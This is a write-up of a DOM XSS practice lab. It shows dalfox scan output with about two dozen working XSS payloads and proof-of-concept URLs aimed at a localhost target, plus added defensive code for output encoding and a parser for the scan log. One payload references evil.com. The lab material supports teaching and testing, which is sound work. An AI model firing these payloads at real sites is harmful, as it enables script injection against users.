
12 DOM XSS Parameters for Automated Scanning

12 DOM XSS Parameters for Automated Scanning: a social network with 12 different parameters that can be injected into the DOM through different sinks (innerHTML, document.write, eval, outerHTML, setTimeout, location.replace). Ideal for practicing with automated tools such as dalfox.
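On the defensive side, the fix for every one of those sinks is the same discipline: encode the untrusted value for the exact context it lands in before it reaches the sink. The scan output further down shows two such contexts, the `q` value reflected into an HTML text node ("Search results for: …") and the `lang` value reflected into a single-quoted JavaScript string literal inside an inline script (`var langVal = '…'`). The following is an added example of my own, not code from the lab or from dalfox; the helper names (`escapeHtml`, `toJsStringLiteral`, `renderSearchHeading`, `renderLangScript`) are hypothetical, and the lab's real source is not shown on this page.

```javascript
// Added example (not from the lab or from dalfox): context-aware output encoding for
// the two reflection contexts the dalfox run reports. Helper names are hypothetical.

// HTML text/attribute context: encode the five characters that can change how the
// HTML parser tokenizes the surrounding markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// JavaScript string-literal context inside an inline <script>: JSON.stringify takes
// care of quotes, backslashes and control characters; on top of that, escape < > &
// (so "</script>" can never close the element) and the U+2028/U+2029 line terminators
// (valid in JSON strings, but they used to break JS parsing).
function toJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The heading the scanner flagged at "659 line", rendered safely.
function renderSearchHeading(q) {
  return `<h3>Search results for: ${escapeHtml(q)}</h3>`;
}

// The inline script the scanner flagged at "798 line", rendered safely.
function renderLangScript(lang) {
  return `<script>var langVal = ${toJsStringLiteral(lang)};</script>`;
}

// Quick self-check for a rendered script fragment: the only "</script>" allowed is
// the one that closes the element we emitted ourselves.
function scriptFragmentIsInert(fragment) {
  const closer = '</script>';
  return fragment.indexOf(closer) === fragment.length - closer.length;
}

// Stand-alone run with the two payloads dalfox verified on this lab.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderSearchHeading("'><embed src=javascript:alert(1)></embed>"));
  console.log(renderLangScript("</script><svg><script/class=dalfox>alert(1)</script>-&apos;"));
}
```

With this in place the reflections still happen (the value is still on the page), but dalfox's `[V]` verdicts disappear because no payload can break out of its context; that is the signal to look for when re-running the scanner after a fix.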

dalfox url http://localhost:1000/
                                                        
               ░█▒               
             ████     ▓                    
           ▓█████  ▓██▓                  
          ████████████         ░          
        ░███████████▓          ▓░     
     ░████████████████        ▒██░    
    ▓██████████▒███████     ░█████▓░    
   ██████████████░ ████        █▓     
 ░█████▓          ░████▒       ░         Dalfox v2.12.0
 █████               ▓██░             
 ████                  ▓██      Powerful open-source XSS scanner       
 ███▓        ▓███████▓▒▓█░     and utility focused on automation.       
 ███▒      █████                     
 ▓███     ██████                    
 ████     ██████▒                
 ░████    ████████▒
 
 🎯  Target                 http://localhost:1000/
 🏁  Method                 GET
 🖥   Performance            100 worker / 1 cpu
 ⛏   Mining                 true (Gf-Patterns, DOM Mining Enabled)
 ⏱   Timeout                10
 📤  FollowRedirect         false
 🕰   Started at             2026-05-26 17:10:08

[*] -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[*] Starting scan [SID:Single] / URL: http://localhost:1000/
[I] Found 4 testing points in DOM-based parameter mining
[I] Content-Type is text/html; charset=utf-8
[I] Reflected q param => \  $  =  +  ,  -  .  ]  :  <  >  "  '  `  ;  |  (  {  }  [  )
    659 line:  Search results for: Dalfox
[I] Reflected lang param => \  +  ,  ]  [  }  {  )  |  (  ;  `  '  "  >  <  .  =  -  $  :
    798 line:      var langVal = 'Dal
[W] Reflected Payload in HTML: q='><embed src=javascript:alert(1)></embed>
    659 line:  Search results for: '><embed src=javascript:alert(1)></embed></h3>
[POC][R][GET][inHTML] http://localhost:1000/?q=%27%3E%3Cembed+src%3Djavascript%3Aalert%281%29%3E%3C%2Fembed%3E
[W] Reflected Payload in HTML: lang=><textarea onfocus=alert(1) autofocus></textarea>
    798 line:      var langVal = '><textarea onfocus=alert(1) autofocus></textarea>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Ctextarea+onfocus%3Dalert%281%29+autofocus%3E%3C%2Ftextarea%3E
[V] Triggered XSS Payload (found DOM Object): q="><IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))" class=dalfox>
    659 line:  Search results for: "><IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83)
[POC][V][GET][inHTML] http://localhost:1000/?q=%22%3E%3CIMG+SRC%3Dx+onpopstate%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><button onfocus=alert(1) autofocus>test</button>
    798 line:      var langVal = '><button onfocus=alert(1) autofocus>test</button>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cbutton+onfocus%3Dalert%281%29+autofocus%3Etest%3C%2Fbutton%3E
[W] Reflected Payload in HTML: lang=><svg><foreignObject><img src=x onerror=alert(1)></foreignObject>
    798 line:      var langVal = '><svg><foreignObject><img src=x onerror=alert(1)></foreignObj
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Csvg%3E%3CforeignObject%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%2FforeignObject%3E
[W] Reflected Payload in HTML: lang="><SvG/onload=alert(1) id=dalfox>
    798 line:      var langVal = '"><SvG/onload=alert(1) id=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3CSvG%2Fonload%3Dalert%281%29+id%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><object data=javascript:alert(1)></object>
    798 line:      var langVal = '><object data=javascript:alert(1)></object>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cobject+data%3Djavascript%3Aalert%281%29%3E%3C%2Fobject%3E
[W] Reflected Payload in HTML: lang=><link rel=preconnect href=//evil.com onload=alert(1) class=dalfox>
    798 line:      var langVal = '><link rel=preconnect href=//evil.com onload=alert(1) class=d
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Clink+rel%3Dpreconnect+href%3D%2F%2Fevil.com+onload%3Dalert%281%29+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><button onfocus=alert(1) autofocus>test</button>
    798 line:      var langVal = ''><button onfocus=alert(1) autofocus>test</button>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Cbutton+onfocus%3Dalert%281%29+autofocus%3Etest%3C%2Fbutton%3E
[W] Reflected Payload in HTML: lang=><select onfocus=alert(1) autofocus><option>test</option></select>
    798 line:      var langVal = '><select onfocus=alert(1) autofocus><option>test</option></se
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cselect+onfocus%3Dalert%281%29+autofocus%3E%3Coption%3Etest%3C%2Foption%3E%3C%2Fselect%3E
[W] Reflected Payload in HTML: lang="><img src=x onerror="requestAnimationFrame(()=>alert(1))" class=dalfox>
    798 line:      var langVal = '"><img src=x onerror="requestAnimationFrame(()=>alert(1))" cl
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3Cimg+src%3Dx+onerror%3D%22requestAnimationFrame%28%28%29%3D%3Ealert%281%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><marquee onstart=alert(1)></marquee>
    798 line:      var langVal = '><marquee onstart=alert(1)></marquee>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cmarquee+onstart%3Dalert%281%29%3E%3C%2Fmarquee%3E
[W] Reflected Payload in HTML: lang="><IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))" class=dalfox>
    798 line:      var langVal = '"><IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))" cl
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3CIMG+SRC%3Dx+onplay%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><embed src=# codebase=javascript:alert(document.domain)// class=dalfox></embed>
    798 line:      var langVal = ''><embed src=# codebase=javascript:alert(document.domain)// c
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Cembed+src%3D%23+codebase%3Djavascript%3Aalert%28document.domain%29%2F%2F+class%3Ddalfox%3E%3C%2Fembed%3E
[W] Reflected Payload in HTML: lang=><form action=javascript:alert(1) class=dalfox><input type=submit></form>
    798 line:      var langVal = '><form action=javascript:alert(1) class=dalfox><input type=su
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cform+action%3Djavascript%3Aalert%281%29+class%3Ddalfox%3E%3Cinput+type%3Dsubmit%3E%3C%2Fform%3E
[W] Reflected Payload in HTML: lang="><svg onload="[].constructor.constructor('alert(1)')()" class=dalfox>
    798 line:      var langVal = '"><svg onload="[].constructor.constructor('alert(1)')()" clas
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3Csvg+onload%3D%22%5B%5D.constructor.constructor%28%27alert%281%29%27%29%28%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><sVg/onload=alert(1) class=dalfox>
    798 line:      var langVal = ''><sVg/onload=alert(1) class=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3CsVg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><keygen onfocus=alert(1) autofocus>
    798 line:      var langVal = '><keygen onfocus=alert(1) autofocus>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Ckeygen+onfocus%3Dalert%281%29+autofocus%3E
[W] Reflected Payload in HTML: lang='><img/src/onerror=.1|alert`` class=dalfox>
    798 line:      var langVal = ''><img/src/onerror=.1|alert`` class=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><a href='javascript&colon;alert(1)'>click
    798 line:      var langVal = ''><a href='javascript&colon;alert(1)'>click';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Ca+href%3D%27javascript%26colon%3Balert%281%29%27%3Eclick
[W] Reflected Payload in HTML: lang="><IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))" class=dalfox>
    798 line:      var langVal = '"><IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3CIMG+SRC%3Dx+onstorage%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang="><img src=x onerror="self.alert(1)" class=dalfox>
    798 line:      var langVal = '"><img src=x onerror="self.alert(1)" class=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3Cimg+src%3Dx+onerror%3D%22self.alert%281%29%22+class%3Ddalfox%3E
[V] Triggered XSS Payload (found DOM Object): lang=</script><svg><script/class=dalfox>alert(1)</script>-%26apos;
    798 line:      var langVal = '</script><svg><script/class=dalfox>alert(1)</script>-%26apos;
[POC][V][GET][inHTML] http://localhost:1000/?lang=%3C%2Fscript%3E%3Csvg%3E%3Cscript%2Fclass%3Ddalfox%3Ealert%281%29%3C%2Fscript%3E-%2526apos%3B
[*] -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[*] [duration: 5.136814462s][issues: 23] Finish Scan!

As the tip suggests, we'll use Dalfox to detect all the parameters we can inject code into. This tool is very good at automating the process.

[Screenshot: dom_12_alert]

We can test what it finds. If you want to try Dalfox => https://github.com/hahwul/dalfox
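A scan like the one above produces 23 issue lines for only two parameters, so the first thing to do before testing anything by hand is to collapse the output into a per-parameter view: which parameters merely reflect a payload (`[W]`) and which dalfox actually verified in the DOM (`[V]`), together with the `[POC]` URLs to reproduce them. The lab advertises 12 injectable parameters, yet this run mined only 4 testing points and confirmed `q` and `lang`, so the summary also reports the mined count to make that coverage gap visible. The parser below is an added example of my own, not part of the writeup and not dalfox's own code; the line formats it matches are taken from the output above, and the sample text is copied from that output, trimmed to a few representative lines.

```javascript
// Added example (my own code, not from the lab writeup or from dalfox): turn dalfox's
// plain-text output into a per-parameter triage summary. SAMPLE_OUTPUT is copied from
// the scan above, trimmed to a few lines.
const SAMPLE_OUTPUT = `
[*] Starting scan [SID:Single] / URL: http://localhost:1000/
[I] Found 4 testing points in DOM-based parameter mining
[I] Content-Type is text/html; charset=utf-8
[W] Reflected Payload in HTML: q='><embed src=javascript:alert(1)></embed>
    659 line:  Search results for: '><embed src=javascript:alert(1)></embed></h3>
[POC][R][GET][inHTML] http://localhost:1000/?q=%27%3E%3Cembed+src%3Djavascript%3Aalert%281%29%3E%3C%2Fembed%3E
[W] Reflected Payload in HTML: lang=><textarea onfocus=alert(1) autofocus></textarea>
    798 line:      var langVal = '><textarea onfocus=alert(1) autofocus></textarea>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Ctextarea+onfocus%3Dalert%281%29+autofocus%3E%3C%2Ftextarea%3E
[V] Triggered XSS Payload (found DOM Object): q="><IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))" class=dalfox>
[POC][V][GET][inHTML] http://localhost:1000/?q=%22%3E%3CIMG+SRC%3Dx+onpopstate%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22+class%3Ddalfox%3E
[V] Triggered XSS Payload (found DOM Object): lang=</script><svg><script/class=dalfox>alert(1)</script>-%26apos;
[POC][V][GET][inHTML] http://localhost:1000/?lang=%3C%2Fscript%3E%3Csvg%3E%3Cscript%2Fclass%3Ddalfox%3Ealert%281%29%3C%2Fscript%3E-%2526apos%3B
[*] [duration: 5.136814462s][issues: 23] Finish Scan!
`;

// Line shapes as they appear in the output above (assumed stable enough for a log parser).
const MINING_RE  = /^\[I\] Found (\d+) testing points in DOM-based parameter mining$/;
const FINDING_RE = /^\[(W|V)\] [^:]+: ([A-Za-z0-9_]+)=(.*)$/;
const POC_RE     = /^\[POC\]\[(R|V)\]\[([A-Z]+)\]\[(\w+)\] (\S+)$/;

function parseDalfoxOutput(text) {
  const byParam = new Map();
  let testingPoints = null;
  let pending = null; // finding that is waiting for its [POC] line

  for (const raw of text.split('\n')) {
    const line = raw.trim();
    let m;
    if ((m = MINING_RE.exec(line))) {
      testingPoints = Number(m[1]);
    } else if ((m = FINDING_RE.exec(line))) {
      const [, level, param, payload] = m;
      if (!byParam.has(param)) {
        byParam.set(param, { param, reflected: 0, verified: 0, pocs: [] });
      }
      const entry = byParam.get(param);
      if (level === 'V') entry.verified += 1; else entry.reflected += 1;
      pending = { entry, level, payload };
    } else if (pending && (m = POC_RE.exec(line))) {
      const [, kind, method, context, url] = m;
      pending.entry.pocs.push({ kind, method, context, url, payload: pending.payload });
      pending = null;
    }
    // "659 line: ..." context lines and other [I]/[*] lines are ignored on purpose.
  }
  return { testingPoints, findings: [...byParam.values()] };
}

// Rank parameters: verified executions first, then by number of reflections, and keep
// only the tool-verified ([POC][V]) URLs for the report.
function summarize(text) {
  const { testingPoints, findings } = parseDalfoxOutput(text);
  const rows = findings
    .map((f) => ({
      param: f.param,
      verified: f.verified,
      reflected: f.reflected,
      status: f.verified > 0 ? 'CONFIRMED' : 'REFLECTED_ONLY',
      verifiedPocs: f.pocs.filter((p) => p.kind === 'V').map((p) => p.url),
    }))
    .sort((a, b) => b.verified - a.verified || b.reflected - a.reflected);
  return { testingPoints, rows };
}

// Stand-alone run: print the summary for the sample.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(summarize(SAMPLE_OUTPUT), null, 2));
}
```

A `REFLECTED_ONLY` row still deserves a manual look (dalfox only marks `[V]` when its own DOM check fires, and sinks such as `eval` or `setTimeout` behind user interaction are easy for an automated run to miss), but the `CONFIRMED` rows and their verified POC URLs are where a fix should be retested first.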

This post is licensed under CC BY 4.0 by the author.